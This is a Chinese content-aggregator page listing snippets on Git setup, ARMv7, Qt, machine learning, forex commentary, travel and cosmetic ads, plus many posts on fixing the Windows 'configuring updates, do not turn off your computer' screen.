    1.下载Git,官网地址:https://git-scm.com/,进入官网首页在右下方的显示器中找到最新的版本下载,点击下载,跳转到下载页面下载完成2.安装Git双击刚刚下载完成的安装文件,打开安装设置界面,点击“Next”选择安装目录,点击“Next”选择配置组件,默认即可,点击“Next”设置…...

    2024/3/13 22:21:55
  20. armv7学习记录

    ARM架构支持跨大范围性能点的实现。ARM处理器的架构简单性导致了非常小的实现,而小的实现意味着设备可以具有非常低的功耗。实现大小、性能和非常低的功耗是ARM体系结构的关键属性。 ARM架构是一个精简指令集计算机(RISC)架构,因为它包含了这些RISC架构特性: 一个大的统一寄存…...

    2024/3/13 22:21:53

最新文章

  1. 【Qt】:多种方式编辑hello world

    多种方式编辑hello world 一.QLabel二.对象树三.使用单行编辑框四.使用按钮 (小技巧&#xff1a;1.可以使用F4来进行头文件和对应cpp文件的切换&#xff1b;2.写完一个函数的声名之后,按下altenter,就可以自动的在对应的cpp 文件中添加函数的定义了.) 一.QLabel 注意这里是QSt…...

    2024/3/29 19:52:24
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. 小谈HTML5和CSS3的一些重要特性,页面重构需要注意的方面?

    HTML5和CSS3是当前前端开发中最重要的技术之一。它们提供了丰富的功能和效果&#xff0c;使得页面设计更加灵活和交互性更强。在进行页面重构时&#xff0c;我们需要注意一些方面&#xff0c;以确保页面的质量和性能。下面将详细介绍HTML5和CSS3的一些重要特性&#xff0c;并讨…...

    2024/3/28 12:29:28
  4. jetcache 2级缓存模式实现批量清除

    需求 希望能够实现清理指定对象缓存的方法&#xff0c;例如缓存了User表&#xff0c;当User表巨大时&#xff0c;通过id全量去清理不现实&#xff0c;耗费资源也巨大。因此需要能够支持清理指定本地和远程缓存的批量方法。 分析 查看jetcache生成的cache接口&#xff0c;并没…...

    2024/3/28 2:28:54
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/3/29 18:08:39
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/3/29 18:08:34
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/3/29 2:45:46
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/3/29 16:26:39
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/3/29 5:19:52
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/3/29 18:08:00
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/3/29 11:11:56
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/3/29 1:13:26
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/3/29 8:28:16
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/3/29 7:41:19
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/3/29 18:07:15
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/3/29 9:57:23
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/3/29 0:49:46
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/3/29 18:06:57
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/3/29 17:27:19
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/3/29 18:06:36
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/3/29 18:06:22
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/3/28 18:26:34
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/3/29 18:06:01
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/3/28 20:09:10
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57